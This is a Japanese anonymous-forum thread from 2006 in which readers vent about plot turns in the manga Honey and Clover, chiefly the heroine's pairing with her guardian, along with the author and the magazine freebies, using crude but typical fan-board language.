ハチクロとは 作者の作者による作者のためのファンタ自慰

559 :花と名無しさん:2006/07/17(月) 14:49:54 ID:???0
>>548
そうなんだ…。
クッキーだったらハチクロ、合いそうだったのにね。

つい最近、NANAとハチクロを両方とも売ったけど、
NANAとハチクロと潔く柔く(←クッキーの連載漫画)を
集めていた者のたわごとだけど…。


560 :花と名無しさん:2006/07/17(月) 14:50:23 ID:???0
9巻買ったらマグネットなんか付いてた
(゚听)イラネ

561 :花と名無しさん:2006/07/17(月) 14:53:53 ID:???0
竹本がお花が変えなくて道端の花を摘んでプレゼントというのは
「竹本、貧乏、( ´,_ゝ`)プッ!!」という
バカにしたエピソードではなく
ウミノさん的には、ほのぼのであったかいエピソードの
つもりで描いたんじゃないかと思う。
失敗してるが。

同じく
「あのコ(白い土鳩)あゆに似てる
 胸がふっくらして足がピンクで〜」も
ウミノさん的には、ほのぼのであったかいエピソードの
つもりで描いたんだろう。
胸がふっくらとか足がピンクとかの所の気持ち悪さや
土鳩は鳴き声と糞害が凄まじくて害鳥なことにも気付かずに。


562 :花と名無しさん:2006/07/17(月) 14:55:39 ID:nFLyO+XO0
>>561
> ウミノさん的には、ほのぼのであったかいエピソードの
> つもりで描いたんじゃないかと思う。
いやいや、ちゃんと最後に
花も買えない男なんて
はぐ(わたし)に近づく権利なんてないって
辛口ポエム炸裂してますからw

563 :花と名無しさん:2006/07/17(月) 15:00:47 ID:???0
sageて・・・

564 :花と名無しさん:2006/07/17(月) 15:02:20 ID:???0
今、コーラスを買うと
オリジナル・タオルコースターウミノクマ&クローバーの2枚セット

今、別冊コーラスを買うと
ホイップちゃんマグネット付き

今、ハチクロ9巻を買うと
ミドリちゃんマグネット付き

そして7月28日発売のコーラスを買うと
1.ミドリちゃんふせん 
2.マグネット2個セット(リーダー&ウミノクマ)



何このふろく・・・('A`)

565 :花と名無しさん:2006/07/17(月) 15:04:43 ID:???0
森田とくっつくにしろ(正直タケノコはもう可能性無いと思ってる)
一回自立できてからじゃないと納得できん。

566 :花と名無しさん:2006/07/17(月) 15:04:52 ID:???0
付録自体の価値はどうでもいいようだ

雑誌を値上げする口実ができれば

567 :花と名無しさん:2006/07/17(月) 15:06:00 ID:???0
>566
購買者を馬鹿にしてるよな。

568 :花と名無しさん:2006/07/17(月) 15:07:05 ID:???0
おまいら殺伐としすぎ。
これでも見てマターリしる。

http://pya.cc/pyaimg/pimg.php?imgid=24461

569 :花と名無しさん:2006/07/17(月) 15:11:34 ID:???0
凡人にやっかまれ人間関係に嫌気がさす描写は
はぐの同級生からの「作品作らなきゃだもんね〜」と
決定打である森田兄の「持ってる奴にはわからない」で十分だろうに
このうえモブ君まで「才能のあるあんたには」ってそりゃないよ。
おまえはここで「森田さんにならはぐちゃんの辛さがわかるはずだ」とか言うキャラじゃなかったか?
奇麗事で塗り固められたたけのこが好きだった。

570 :花と名無しさん:2006/07/17(月) 15:15:29 ID:???0
>>568
僕たちはまた回り始める(´ω`*)

571 :花と名無しさん:2006/07/17(月) 15:15:57 ID:???0
>>562
げ、そうなのか。
その章は読まないで語ってごめんね。

ウミノさん、急に竹本をここまで貶めるなんて
いったい何があったんだろう…。
それまでも竹本は不幸でむくわれないかわいそうな子だったけど
性格の悪い子には書いてなかったよね。

やっぱり映画???
竹本きゅんをジャニーズのクソガキが演じるなんて
許せないわキー!みたいな。

さすがにそれはないだろうと思うけど
タイミングがさ…

572 :花と名無しさん:2006/07/17(月) 15:20:09 ID:???0
桜井の性格が溶け込んできたんだとよ

573 :花と名無しさん:2006/07/17(月) 15:22:15 ID:???0
何それ、あの育ちすぎて硬くなって割れてささくれた青竹みたいな
タケノコが桜井君だっていうの?

574 :花と名無しさん:2006/07/17(月) 15:25:22 ID:???0
>>564
主要キャラの絵を使えないという規制でもあるような付録ですね。

ウミノさん、あの頃の竹本を返して・゚・(ノД`)・゚・。

575 :花と名無しさん:2006/07/17(月) 15:26:57 ID:???0
森田は花屋一軒買い占めて病室を花でうめつくし、
超えられない金という名の壁をみせてやってください。
正直たけのこにはすっきりした気持ちで福岡行ってほしいからさ
こっぱみじんに砕いちゃってほしい。

576 :花と名無しさん:2006/07/17(月) 15:29:08 ID:???0
小6だっていまどきそんな付録よろこばねーぞコラ☆

577 :花と名無しさん:2006/07/17(月) 15:30:31 ID:nFLyO+XO0
やっぱ自分探しがいけなかった。
帰るなりはぐの手握るとか森田の愛を拒否とか
生意気になりやがった。中学までパシリのくせに高校デビューしたみたいな感じ。
さすがに森田と土手で対等に喧嘩してるとき
おめえはそれでも格下だんだボケ!って思ったね。
抱きあったり語り合ったしたことねえだろタケノコ!
そもそもはぐとどれだけ身のある話をしたことあるんだよ
せいぜい何パン食べるだのソース多めにとかくっだらねえことだけだろうが!
死ねタケノコ!

578 :花と名無しさん:2006/07/17(月) 15:31:03 ID:???0
コーラス発売の10日前のスレ↓…まさかこんな事になるとはなあ

171 名前: 花と名無しさん 2006/04/17(月) 22:37:32 ID:???0
今回修ちゃん先生はスキンシップが育ての父親のソレじゃないって言うか、
年頃の娘を抱っこで前から後ろからプレイは竹本や森田に任せてほしかったな
ハチクロ世界らしいと言えばらしいんだけど、実写で想像しちゃってキモかったw
ハグは子供だよって言いたかったんだろうけどね


172 名前: 花と名無しさん 2006/04/17(月) 23:23:46 ID:???0
>>171
その場面自分も気になった。
修ちゃん×はぐエンドへのフラグかもしれないけど。

もう少し普通の抱き寄せ方のほうが良かったんでは…

173 名前: 花と名無しさん 2006/04/17(月) 23:36:17 ID:???0
修ちゃん×はぐとか気持ち悪い

175 名前: 花と名無しさん 2006/04/18(火) 00:15:25 ID:???0
>>172
隣に座ってる先生がハグの話をじっと聞いてやって、やさしく背中をさすってやるだけでも
かなりじーんとくるかも・・・父親なんだなぁってw
修ちゃん先生がラストでハグに対して父親から男になったら泣くよ〜w


176 名前: 花と名無しさん 2006/04/18(火) 00:15:57 ID:???0
>修ちゃん×はぐエンドへのフラグ

ありえんてw

579 :花と名無しさん:2006/07/17(月) 15:36:31 ID:???0
しかし貧乏部屋で自分の貧乏さを嘆いてる9巻の竹本を見ていて涙が出たぞオレは。

真山って「好きな人のいざというときのために金ためる」発言もかっこいいし
情緒も収入も安定してるし、手に職もあるし責任感もあるし
森田への対応も最近の竹本と違って愛があるし、普通に考えて一番いいな。
ストーカーでさえなければ・・・・・・・・・・

580 :花と名無しさん:2006/07/17(月) 15:38:43 ID:???0
>>578
あ、涙でてきた。

581 :花と名無しさん:2006/07/17(月) 15:39:57 ID:???0
真山・・・たけのこや森田の気持ち知って応援していたと思っていたが
臭×はぐ成立に、号泣してお祝いを申し述べておりましたが・・

582 :花と名無しさん:2006/07/17(月) 15:40:10 ID:???0
ストーカーってだけで全てがマイナスだよ
本気で気持ち悪い

583 :花と名無しさん:2006/07/17(月) 15:44:09 ID:???0
>>577
チューもね。

森田はアジトで自分の過去のことはぐに話しちゃったんだよね?何を血迷ったんだ。
いくらなんでもそんな相談乗ってられる精神状態じゃないだろパグも・・・
森田はもうちょっとやれるこだと思ってたよ。
そこにたけのこの「今辛いのは彼女」がかかるかと思ったが、
たけのこは森田の事情なんて知らんもんね。あれなんだったの?


584 :花と名無しさん:2006/07/17(月) 15:47:09 ID:???0
>>581
どっちかっていうとタケノコ推奨派だったよね。
真山は森田を無敵の天才変人と思ってるふしがあるから、
森田サンはほっといても平気だろう、タケモトタケモト・・・って世話焼いてた感じ?

585 :花と名無しさん:2006/07/17(月) 15:49:03 ID:???0
今から28日がオトロシイ・・・
>>578の悲劇再び、になりませんように。

586 :花と名無しさん:2006/07/17(月) 15:49:15 ID:???0
>>578
せつない・・・ハチクロの登場人物なんかより
このスレのみんなのほうがずっとせつない

587 :花と名無しさん:2006/07/17(月) 15:53:21 ID:???0
>>581
真山はリカ修の可能性が消えて
うれしかったんだよ

588 :花と名無しさん:2006/07/17(月) 15:53:29 ID:???0
いかに臭ぱぐが突然すぎる展開だったかがわかるな。
父親が男にってまたナマナマしい。

589 :花と名無しさん:2006/07/17(月) 15:56:21 ID:???0
真山は恋愛には異常な変態だが、友情は大事にするところを買ってたのに・・・


590 :花と名無しさん:2006/07/17(月) 15:57:55 ID:???O
友情とかギャグとかほのぼのさとか、この漫画の良いモノが全部消えたな

591 :花と名無しさん:2006/07/17(月) 15:59:22 ID:???0
>>590
血のつながりを超えた親子愛とかねー

ほんとに笑えない同人誌みたい

592 :花と名無しさん:2006/07/17(月) 15:59:49 ID:???0
>>588
まさに父親が男にだよね、気持ち悪い・・・

593 :花と名無しさん:2006/07/17(月) 16:00:26 ID:???O
いきなり禁断の愛かよ…

594 :花と名無しさん:2006/07/17(月) 16:02:05 ID:???0
真山はともかく
山田は?
さんざん励ましてもらっておいて
手つないで帰りながら
森田の幸福ねがってたじゃん。
森田の心配まったくしないの?
もうイヤダー

595 :花と名無しさん:2006/07/17(月) 16:03:24 ID:???0
あれ、そういえば山田って森田→はぐに気づいてたっけ?
はぐ→森田は真山となんか言いあってたけどさ。

596 :花と名無しさん:2006/07/17(月) 16:05:33 ID:???0
10巻は漫画喫茶でいいや

597 :花と名無しさん:2006/07/17(月) 16:05:43 ID:???0
八方美人ばかりだなこの漫画

598 :花と名無しさん:2006/07/17(月) 16:05:56 ID:???0
この展開、色々築いて来たはずの友情も全く無視なんだね

599 :花と名無しさん:2006/07/17(月) 16:06:06 ID:???0
>>594
chapter63より山田の心の声(?)

シ・・・ショック。だって、そんな事私全然気がつかなかったよ・・・
はわーあ、でも・・・そういえば先生だって歳とっているけど
一応男のヒトなんだよね・・・そーだったよね・・いやそんなコト
私、全く考えてなかったってゆーか、まるで圏外だったからってゆーか・・・

600 :花と名無しさん:2006/07/17(月) 16:06:57 ID:???0
そこで鉄人怒らなきゃ!

601 :花と名無しさん:2006/07/17(月) 16:07:27 ID:???0
そういえば「今度どっか行くときはテレビ電話おいてく」って森田言ってたよね。


602 :花と名無しさん:2006/07/17(月) 16:11:41 ID:???0
>>601
あれよかったね
でもそんな良さももう欠片も残っていません

603 :花と名無しさん:2006/07/17(月) 16:12:19 ID:???0
森田・・・本気でカワイソス

馨が帰ってきたら森田家はハッピーエンド☆のつもりかもしれんが
馨の劣等感が払拭されてないんだから何の解決にもなってないよ。

604 :花と名無しさん:2006/07/17(月) 16:13:39 ID:???0
なんでこんなに流れ早いのww


605 :花と名無しさん:2006/07/17(月) 16:13:52 ID:???0
そういえば

恋にもデリートキーがあれば良いのにって言ったら
森田さんは「ロマンチックじゃないから却下」といって笑った

みたいなのって山田のモノローグ?

606 :花と名無しさん:2006/07/17(月) 16:14:52 ID:???0
山田の脳内妄想です

607 :花と名無しさん:2006/07/17(月) 16:15:14 ID:???0
この漫画内には天才がそこら中に転がってるなw

608 :花と名無しさん:2006/07/17(月) 16:16:27 ID:???O
この漫画の魅力って結局なんなんだろうね

609 :花と名無しさん:2006/07/17(月) 16:17:08 ID:???0
>>604
雑誌を追ってる住人が3ヶ月くらい前からやってる祭りに
コミクス派が参加しはじめたから

610 :花と名無しさん:2006/07/17(月) 16:18:01 ID:???0
>>599
ぱぐの心配とかしないのかよ・・もっとどんびきしろよ・・・

611 :花と名無しさん:2006/07/17(月) 16:18:02 ID:???0
>>608
絵がかわいい

612 :花と名無しさん:2006/07/17(月) 16:18:04 ID:???0
>>608
あちこちにちりばめられてるガンダムネタを探す所。

613 :花と名無しさん:2006/07/17(月) 16:19:13 ID:???O
ハチクロを読んで思うこと。

青春は何歳まで適用されますか?

三十路間近の森田さんも青春中ですか?

614 :花と名無しさん:2006/07/17(月) 16:20:10 ID:???O
くだらない魅力だな

615 :花と名無しさん:2006/07/17(月) 16:20:40 ID:???0
>>608
キャラクターに魅力がある
きぶんがほんわかする、甘酸っぱい気分になる

というのがこの漫画の魅力“だった”

616 :花と名無しさん:2006/07/17(月) 16:20:57 ID:???O
森田って今何歳?

617 :花と名無しさん:2006/07/17(月) 16:22:45 ID:???0
>>613
臭ですら青春とか言い出した今・・・

森田は永遠の少年だからいいんです、ほっといてやろうぜ

618 :花と名無しさん:2006/07/17(月) 16:23:49 ID:???0
27くらいか。
伊勢谷より年下?

619 :花と名無しさん:2006/07/17(月) 16:24:11 ID:???0
今の展開

もー、最っ高に最低☆!

620 :花と名無しさん:2006/07/17(月) 16:24:40 ID:???0
今や近親相姦モノに成り下がったからな
いくら血の繋がり的には違うと言っても

621 :花と名無しさん:2006/07/17(月) 16:26:24 ID:???O
27か…

臭には負けてほしくない
近親なんかきんもーっ☆だぞ

622 :花と名無しさん:2006/07/17(月) 16:26:39 ID:???0
義理の父みたいな感じで見てたからほんとうにこの展開は無理☆

623 :花と名無しさん:2006/07/17(月) 16:28:13 ID:???O
中高生はときめくだろうが…ねぇ

624 :花と名無しさん:2006/07/17(月) 16:29:15 ID:???0
でも森田すでに諦めモードだね。
ブラックジャックを読んではぐの手を完治させ二人で世界中を回ってほしい〜
竹本も。。。好きだったのに。

625 :花と名無しさん:2006/07/17(月) 16:30:38 ID:???O
自分も森田好きだったよ

626 :花と名無しさん:2006/07/17(月) 16:31:04 ID:???0
>>623
いくらなんでも中高生はわかると思うよ
これ喜べるのは小学生くらいまでじゃないか?
世の中には純愛しかないと思ってる。

627 :花と名無しさん:2006/07/17(月) 16:31:58 ID:???O
そうか…ウミノって何歳なんだよヽ(`Д´)ノ

628 :花と名無しさん:2006/07/17(月) 16:32:57 ID:???0
森田のギャグとかモカデミーとかはちょっとうざかったが。

629 :花と名無しさん:2006/07/17(月) 16:36:28 ID:???0
純愛なら純愛で
真山とリカが寝ちゃったとか
無ければよかったのに・・・
山田と野宮のホテルとか。
臭だけ特別とは思えないし!
変なとこだけファンタジーでき・も・い☆

630 :花と名無しさん:2006/07/17(月) 16:38:25 ID:???0
>627
来月誕生日で40歳。

631 :花と名無しさん:2006/07/17(月) 16:39:06 ID:???0
「新規参入」「近親相姦」「M&A」
等、最近のハヤリどころを取り入れてみちゃった感じかな。
インスパイア、インスパイア。

632 :花と名無しさん:2006/07/17(月) 16:39:07 ID:???O
……本当に40?

633 :花と名無しさん:2006/07/17(月) 16:40:10 ID:???0
そうなんだよな、そういうにが全く無いファンタジー世界ならよかったのに
山田さん美乳なんだ・・・のとこの臭とか思い出すと
この展開もう気持ち悪くて気持ち悪くて。

634 :花と名無しさん:2006/07/17(月) 16:41:20 ID:???O
臭あぼーんじゃなきゃ納得いかない

635 :花と名無しさん:2006/07/17(月) 16:43:48 ID:???0
>>572
声優の神谷って人の影響もあるようだよ。(ソース:アニメムック)

636 :花と名無しさん:2006/07/17(月) 16:45:01 ID:???0
でも今それだとパグちゃんがぶっ壊れてイカレちゃいそうだからな・・・
森田が死んで、
はぐが「やっぱり自分は森田が好きだった!
臭、おまいと恋愛はムリポ。正直すまんかった。」って気づいてひとり立ち

無理があるorz

637 :花と名無しさん:2006/07/17(月) 16:48:52 ID:???0
自分も、死ぬなら森田かなと思ったが
馨が自殺して後追いとかじゃなきゃ唐突過ぎるよなと思った。
でも馨なんか自殺しなさそうだし。帰ってきそうだし。

638 :花と名無しさん:2006/07/17(月) 16:49:50 ID:???0
>632
1966年生まれだお

639 :花と名無しさん:2006/07/17(月) 16:50:56 ID:???O
あと5cm?以上近づいたらぶっ飛ばすも今はキモい

640 :花と名無しさん:2006/07/17(月) 16:51:17 ID:???0
ここで大穴の野宮死亡で好きになった気持ちをきちんと伝えなかった山田がはぐに
「本当にいいの?」などとグズグズ問う展開を予想。

641 :花と名無しさん:2006/07/17(月) 16:54:40 ID:???0
竹本の病室での告白もどきを阻止したのも・・・

>>640
それいいかもな。
現場で建材落ちてきて死ぬ、と。
それでいっとこう。

642 :花と名無しさん:2006/07/17(月) 16:55:14 ID:???0
tkmtが死んでも別にって感じだしなあ
誰が死ぬのかな、臭ならいいな☆

643 :花と名無しさん:2006/07/17(月) 16:55:50 ID:???0
それはむしろ、森田が山田救済に走ってはぐにかまってる場合じゃなくなりそう。

644 :花と名無しさん:2006/07/17(月) 17:00:09 ID:???0
はぐが死ねば一気に問題解決で竹本も気持ちよく福岡にいけるが
それだとなんだか森田がかわいそう。臭は勝手に嘆いてりゃいいけど

645 :花と名無しさん:2006/07/17(月) 17:02:24 ID:???0
別冊コーラスを立ち読んだら、ハチクロ特集で
映画キャストから原作者へのメッセージ等が載ってた

以下 堺○人からのメッセージ(最初の方うろ覚え)

先生ははぐのような方ですね。人に対して一生懸命なとことか、愛を振りまくところとか。

漫画の制作中は他の事に脇目も振らず集中する、とおうかがいしておりまして
そのストイックさが意外だと思いましたが、反面納得でもあります。

ホント、修道女のように
強い芯を持っておられる方だと思います。
                     [以上]

・・・つーか「修道女」って・・・。
煩悩全開だろうよ、この作者。

646 :花と名無しさん:2006/07/17(月) 17:03:22 ID:???0
なんかスレがす さ ん で ん な ☆

647 :花と名無しさん:2006/07/17(月) 17:04:20 ID:???0
臭が死んだとたんにレア感が失われ森田にも竹本にも見向きもされなくなったはぐ。

648 :花と名無しさん:2006/07/17(月) 17:04:47 ID:???0
>>645
うわあああああ
これ読んで喜んでるんだろうなウミノ・・・・('A`)

649 :花と名無しさん:2006/07/17(月) 17:06:59 ID:???0
>>646 今更なにをw

650 :花と名無しさん:2006/07/17(月) 17:07:40 ID:???0
真山死ぬと、
リカ一人→修リカのもとへ→はぐ一人 で修はぐ解消☆

651 :花と名無しさん:2006/07/17(月) 17:09:56 ID:???0
そうか・・
真山さんサヨウナラ☆

652 :花と名無しさん:2006/07/17(月) 17:10:59 ID:???0
リーダーが「真山さん最近こないですね***」

653 :花と名無しさん:2006/07/17(月) 17:12:39 ID:???0
亀レスだが、>>578がだしてきた
過去スレの日にちが今日からまるまる3ヶ月前なのに今気付いた。
すげえな。ほんとにまた皆の予想の斜め下を逆走していく
展開がありそうな悪寒。

654 :花と名無しさん:2006/07/17(月) 17:13:54 ID:???0
「まさか真山がねぇ・・・」
「**ああっ 美和子さん泣かないでください**」

だめだな、リカさんかわいそうすぎるわ。

655 :花と名無しさん:2006/07/17(月) 17:14:07 ID:???0
これ以上斜め下ってもうどうなるのか見当もつきません><

656 :花と名無しさん:2006/07/17(月) 17:15:24 ID:???0
はぐが小悪魔に目覚め
選ばなくってもいいんじゃない?みんなではぐを支えてよ☆
と三股。

657 :花と名無しさん:2006/07/17(月) 17:25:36 ID:???0
ここの住人は映画観る?

658 :花と名無しさん:2006/07/17(月) 17:36:37 ID:???0
すぐにツタヤレンタル入荷するから劇場は行かない。

659 :花と名無しさん:2006/07/17(月) 17:38:05 ID:NgeEXaAs0
うーん 見ないかも。がきんちょ多そうで、20代後半にはちとつらい。
レンタルしようかなぁ‥ 

660 :花と名無しさん:2006/07/17(月) 17:41:41 ID:???O
はぐは基本的には自分のことで精一杯な奴だろ。
いや、自分のことすら支えきれないか…

他人のことに我が身を割いてかまったことあったか?

あの甘ったれキャラを優しいとか繊細とか思ってる読者はかわいそうだよ。いくら何でも芸術以外に何も出来ないキャラにし過ぎたかもな…

661 :花と名無しさん:2006/07/17(月) 17:42:55 ID:???0
やたらにアニメや映画のスタッフの話を描くのはなぜだろう?
感謝が表したければ直に言えばいいじゃん、会うんだから。


662 :花と名無しさん:2006/07/17(月) 17:48:28 ID:???0
プロっぽくて嬉しいんじゃない?

663 :花と名無しさん:2006/07/17(月) 17:49:23 ID:???0
>>661
同人誌にどうでもいい私信をのせる感覚と同じ

664 :花と名無しさん:2006/07/17(月) 17:49:54 ID:???O
修真山森田しね!!!!
竹本にはぐ返せ
不備で仕方ないよ

665 :花と名無しさん:2006/07/17(月) 17:50:52 ID:???0
>>660
たけもとにコーヒーとロールケーキをもってってやったくらいですね。

666 :花と名無しさん:2006/07/17(月) 17:51:17 ID:???0
キャバ嬢

667 :花と名無しさん:2006/07/17(月) 17:52:05 ID:???0
不憫

668 :花と名無しさん:2006/07/17(月) 17:52:47 ID:???0
噂のケータイナントカ?

669 :花と名無しさん:2006/07/17(月) 17:56:01 ID:???O
空気を読さずにそして散々ガイシュツだろうが…☆


誰もこんな展開望んじゃいない!!
ヽ(`Д´)ノ


ネタがないならもう終わりにしようぜ!!


670 :花と名無しさん:2006/07/17(月) 17:56:13 ID:???O
携帯でごめんなさい
許してチワワ

671 :花と名無しさん:2006/07/17(月) 18:02:07 ID:???0
映画は観るけど10巻は買わないしアニメも2期は見ないお
たけもとの告白まででハチクロは終わったことにしたお

672 :花と名無しさん:2006/07/17(月) 18:15:44 ID:???0
堺のメッセージの「先生ははぐのような方ですね」
にオナニーしていそう。

673 :花と名無しさん:2006/07/17(月) 18:17:36 ID:???0
ねぇ、今までのウミノの発言と
発言が載ってる雑誌や書籍名をテンプレや年表にしない?
「堺萌えでストーリー変えるなんてありえない。
 このスレ住民の妄想だろ」
「死ね竹本!!」
とか書くやつがウザイので。

・堺が花本先生に入ってきた。
・桜井が竹本に入ってきた。

のあたりとか。

674 :花と名無しさん:2006/07/17(月) 18:18:16 ID:???0
映画雑誌にすら「おいおい原作は修はぐかよ」ってかかれてたね

675 :花と名無しさん:2006/07/17(月) 18:21:39 ID:???O
>>673
いらないと思う

676 :花と名無しさん:2006/07/17(月) 18:22:14 ID:???0
携帯の意見は無視無視

677 :花と名無しさん:2006/07/17(月) 18:24:22 ID:???0
ちょっと語っていいですか。
今年の4月
お花見の場所取りをしてる私に友達がハチクロ1〜5巻をを差し入れしてくれて
桜の下で読みながらはぐちゃん達がみた桜も
こんなふうだったのかなーなんて思い
山田に感情移入し、竹本に感情移入し、真山に感情移入し、
今までしてきた色んな恋が走馬灯のように頭の中をかけめぐって一人で泣きそうになった。

そして今日6〜9巻を読んで




ふざけんなーーーーーーーーーーーーーーーーーーーーーーー(`д´;)
なにこの酷い有様!?
9巻なんかはぐ別人だよ。なんでいまさら私とか言って心の中語ってるんだよいきなりケガかよ。
しかもスレよんだら同人とか映画に影響されたとか
なによりも修はぐって、修はぐって、きもいよバカ!涙返せよ羽海野!!!!!

678 :花と名無しさん:2006/07/17(月) 18:26:07 ID:???0
>>673
それだとアンチスレみたいになっちゃうよ。
まあ内容的にはアンチなんだけどさ。

679 :花と名無しさん:2006/07/17(月) 18:26:48 ID:???0
羽海野!!!!!が一瞬 羽海野郎!!!!!に見えた。

680 :花と名無しさん:2006/07/17(月) 18:30:34 ID:???0
>>678
はぁ?

681 :花と名無しさん:2006/07/17(月) 18:36:28 ID:???0
>>674
やっぱり普通の感覚でいって修はぐって変なんだね。

682 :花と名無しさん:2006/07/17(月) 18:42:11 ID:???0
臭はぐを誉めて、このスレ住民を攻撃する書き込みが
ときどきあるけど、大抵電波な書き込みだしね。

683 :花と名無しさん:2006/07/17(月) 18:42:53 ID:???0
8巻までハチクロを貸してた友達に9巻を貸すのを躊躇している。
「やっぱりはぐちゃんは竹本君とが良いな〜。森田さんは思い出として輝いててほしい!」
と楽しそうに言ってた彼女の顔が忘れられない・・・・・・

ハチクロも思い出として記憶の中で輝かせといてあげるべき?

684 :花と名無しさん:2006/07/17(月) 18:44:42 ID:???0
>>683
その方がいい…
友だちなんだろ?

685 :花と名無しさん:2006/07/17(月) 18:45:44 ID:???0
>>683
現実をみせてやるべき
今月号のコーラスも一緒に貸すのがいいよ☆

686 :花と名無しさん:2006/07/17(月) 18:47:47 ID:???0
>>685
鬼畜!

687 :花と名無しさん:2006/07/17(月) 18:48:39 ID:???O
作者叩くのはいいの?

688 :花と名無しさん:2006/07/17(月) 18:51:12 ID:???0
すっかりなんでもありのスレになっております☆
ネタバレ、作者叩き、なんでも来いですよ?

689 :花と名無しさん:2006/07/17(月) 18:54:48 ID:???0
ここは2ch内でいちばん☆が多いスレだとおもうんだがどうだろう。

690 :花と名無しさん:2006/07/17(月) 18:55:12 ID:???O
きんもーっ☆

691 :花と名無しさん:2006/07/17(月) 19:00:29 ID:???0
てか別にストレス解消なら、噛むのは人の手じゃなくてもいいじゃんねえ。
タオルとか歯がためとか噛んどけよ。

692 :花と名無しさん:2006/07/17(月) 19:03:48 ID:???0
父親

693 :花と名無しさん:2006/07/17(月) 19:07:26 ID:???0
まあ自分の手なら百歩譲って良いとして、
他人の手まで噛むのはNGでしょう。

694 :花と名無しさん:2006/07/17(月) 19:08:18 ID:???0
>>691
それ自分も思った。
自傷行為だけならまだしも修が自分を噛めと言ったり(?)
はぐがそれを躊躇せずに修を噛みまくり
その事を羨ましく?感じた竹本にも(゚Д゚)ハァ?だった。
理解できません。

695 :花と名無しさん:2006/07/17(月) 19:14:10 ID:???0
ヒトの腕噛むカバミが正直本気できぼぢわるい

696 :花と名無しさん:2006/07/17(月) 19:15:22 ID:???0
>>694,685
ノシ 同じく理解不能。
なにアイツら陶酔しきっているんだろう、とひいた。

思うんだけど、臭がケガを境に恋愛感情を持ったのなら、
はぐが1年のあたりでケガしても同じ結果なんだよね。
300万が手に入らないだけでさ……

697 :花と名無しさん:2006/07/17(月) 19:15:44 ID:???0
自分、基本コミックス派で
ここの炎上みてから雑誌も立ち読みするようになって
いきなりの修はぐ展開にかなりの違和感と唐突さを感じてたんだけど
実際9巻読んでみたら思ったより全然違和感なかったよ。
一時は売ろうかと思ったけど売らないでて良かった。


698 :花と名無しさん:2006/07/17(月) 19:16:43 ID:???O
おうよ!!理解できなくて結構!!!



俺も理解できねえもん
はぁ?みたいな

699 :花と名無しさん:2006/07/17(月) 19:17:37 ID:???0
漫画チックな「天才タイプ」にとらわれすぎだよな
病的に繊細だったり
奇矯な行動とったら天才、みたいな刷り込みでもあるんかな

700 :花と名無しさん:2006/07/17(月) 19:20:13 ID:???O
>>697
過剰反応し杉って言いたいなら言えば?

701 :花と名無しさん:2006/07/17(月) 19:28:13 ID:???O
し杉

702 :花と名無しさん:2006/07/17(月) 19:36:08 ID:???0
はいはい携帯臭携帯臭


703 :花と名無しさん:2006/07/17(月) 19:40:37 ID:???0
私も違和感そんななかったけどねぇ

>>700カルシウム足りないんじゃない?

704 :花と名無しさん:2006/07/17(月) 19:46:24 ID:???O
皆イライラし杉w


705 :花と名無しさん:2006/07/17(月) 19:47:00 ID:???0
違和感ありな人たちが騒ぎ立てているだけで
違和感ない人たちだって普通にいるよ
こういうところにはあまり出てこないだけで

まあそこは2chてことでこういう意見もあるんだと読み流せば( ´_ゝ`)

706 :花と名無しさん:2006/07/17(月) 19:47:44 ID:???0
私は最初に1〜9を一気に読んだけど、
やっぱり9巻違和感ありまくりだよ。
はぐみの性格とか、一人称とか変わってて驚いた

707 :花と名無しさん:2006/07/17(月) 19:49:28 ID:???0
映画のはぐ役の子の雰囲気が
羽海野さんの描くはぐに入ってきたそうです。
雑誌のインタビューや映画関連の本でのインタビューより。

708 :花と名無しさん:2006/07/17(月) 19:49:44 ID:???0
>>697
「はぐが芸術のパートナーとして修を選ぶ」という筋は通ってる(だいぶ説明不足だけどね)。
ただ、はぐは「修が自分に対して恋愛感情を持っている」と認識してる(?)上で
「一生側にいてください」という発言をした。ここがややこしいんだよ。
さらに、
「好きさ大好きさ」発言前の時点で、
修がはぐに対して恋愛感情を持ってることを匂わせる描写が
「ん ああ(///)」くらいしかないし、はぐに恋心抱くなるようになるまでの経緯が
全く説明されてないことがひっかかってる。

709 :花と名無しさん:2006/07/17(月) 19:53:34 ID:???0
はぐは森田と修どっちが本当に好きってことになってるの?今

710 :花と名無しさん:2006/07/17(月) 19:53:41 ID:???0
何事に対しても自分でなんとかしようとしないはぐが大嫌いです。

711 :花と名無しさん:2006/07/17(月) 19:53:58 ID:???0
深く考察しないで、雰囲気だけで味わって読むような人や
はぐ+ウミノの電波を受信できるような人には
受けがいいだろうね。

あまり頭が良くなさそうな女性のハチクロファンのサイトは
「修ちゃんカッコイイ。
 やっぱり若造より大人の男よね。
 はぐちゃんは男を見る目がある」
みたいな感想のが結構あったし。

712 :花と名無しさん:2006/07/17(月) 19:54:44 ID:???0
>>709
読者がうるさいんでとりあえず森田が好きなんだけど
こうするしか方法がなかったと言い訳が見えてきますた。

713 :花と名無しさん:2006/07/17(月) 19:56:02 ID:???0
>>709
「森田」説が有力っぽいよ (BY野宮、真山、あゆ)

714 :花と名無しさん:2006/07/17(月) 19:58:14 ID:???0
>>711
あなたの文にすごく傷つきました
それにハチクロファンサイトのことを言うなんて酷くないですか?



715 :花と名無しさん:2006/07/17(月) 19:59:27 ID:???0
>>714
2ch向いてないな、おいw

716 :花と名無しさん:2006/07/17(月) 20:00:00 ID:???0
傷つきたくないなら2ちゃんに来ないことだよ・・・

717 :花と名無しさん:2006/07/17(月) 20:01:43 ID:???0
電波受信者は傷つきやすいんですよw

718 :花と名無しさん:2006/07/17(月) 20:02:23 ID:???0
そのサイトの管理人だったりして…

719 :花と名無しさん:2006/07/17(月) 20:08:23 ID:???0
>>714
「○○とか言ってるやつは××」とかいう類の発言は
2chじゃ日常茶飯事ですよ
それらにいちいち傷ついてちゃ話にならない
もう2ちゃんに来ないか、しばらくROMってみるかしなよ


720 :花と名無しさん:2006/07/17(月) 20:11:49 ID:???0
これは初心者をかたった煽りじゃないだろうか。

721 :花と名無しさん:2006/07/17(月) 20:12:27 ID:???0
なんだかんだで優しいなおまいら


今日は UMINO☆ 日

722 :花と名無しさん:2006/07/17(月) 20:12:34 ID:???0
無駄話はもういい

723 :花と名無しさん:2006/07/17(月) 20:14:20 ID:???0
JA、なんか話題振ろうぜ

724 :花と名無しさん:2006/07/17(月) 20:19:06 ID:???0
>>214
わざわざ自分で2に来といて何て言い草W
ヤホーのウミノ掲示板から始めたら?
214にぴったりのお湯加減ですよ?

725 :花と名無しさん:2006/07/17(月) 20:19:07 ID:???0

たけのこのおいしい調理方法

726 :花と名無しさん:2006/07/17(月) 20:21:10 ID:???0
1、はぐに一目ぼれさせる

727 :花と名無しさん:2006/07/17(月) 20:23:48 ID:???O
でも711は頭が悪そうなとか余計な一言だと思う

